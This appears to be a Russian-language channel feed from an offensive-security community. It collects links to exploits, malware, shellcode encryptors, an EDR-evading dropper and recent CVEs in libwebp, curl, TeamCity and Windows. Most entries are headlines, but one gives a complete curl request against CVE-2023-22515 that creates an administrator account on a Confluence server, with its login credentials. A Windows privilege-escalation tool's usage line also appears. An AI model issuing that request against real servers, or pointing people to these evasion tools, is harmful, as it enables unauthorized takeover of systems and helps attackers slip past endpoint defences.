0-day для CVE-2023-4863 носится по интернету (chrome не при чем, дыра в libwebp image library).
И все бы ничего, но libwebp интегрирована во всё (ну почти)
Список покрытия

OffensiveCon 2023
Exploit Engineering – Attacking the Linux Kernel
76Слайдов

Что делать, если вас заставляют работать ?!

Интересное на почитать
*
When Exploits Arent Binary
*
Malware as a service (bunnyLoader)
*
#exploits #malware #read

CVE-2023-42793
Authentication Bypass in JetBrains TeamCity CI/CD

Спасибо всем кто поучаствовал. Отдельное спасибо юристу и правоведу

#ran #redteam #malware

Свежий выпуск Inception 7

Supernova
Real fucking shellcode encryptor (бгг)
download

#shellcode #enc

Следим за трендами

* exim RCE
* Linux glibc LPE
* curl RCE
* WS_FTPd
* admin/admin

Abusing Active Directory Certificate Services
Part One (5 october 2023)

#AD

From C, with inline assembly, to shellcode
read

#C #shell

VULN in CURL
get CVE-2023-38545 - поиграться (сегодня patch)

#curl

Update:
How I made a heap overflow in curl

#curl #libcurl #ssrf

CVE-2023-36802
windows Local Privilege Escalation
Usage:
Windows_MSKSSRV_LPE_CVE-2023-6802.exe <pid>
где pid — это идентификатор процесса (в десятичном формате), который требуется повысить до SYSTEM
POC

#win #lpe

Ох твою мать а, не было печали...)))))))))))))))))
Короче, план такой
Надеюсь консультанты из Xpanamas ciscoTalos

CVE-2023-22515
Confluence Data Center and Server - Broken Access Control Vulnerability
POC:
curl -k -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=adm1n&fullName=admin&email=admin@confluence&password=adm1n&confirm=adm1n&setup-next-button=Next" http://confluence/setup/setupadministrator.action

login - adm1n/adm1n

Почитать как это работает

Cordyceps - род спорыньёвых грибов, пиреномицеты, паразитирующие на определённых видах насекомых.
Домен: Эукариоты
Царство: Грибы
*
А кроме того это самоинъекционный дроппер на C++, предназначенный для обхода EDR.
download

#bypass #edr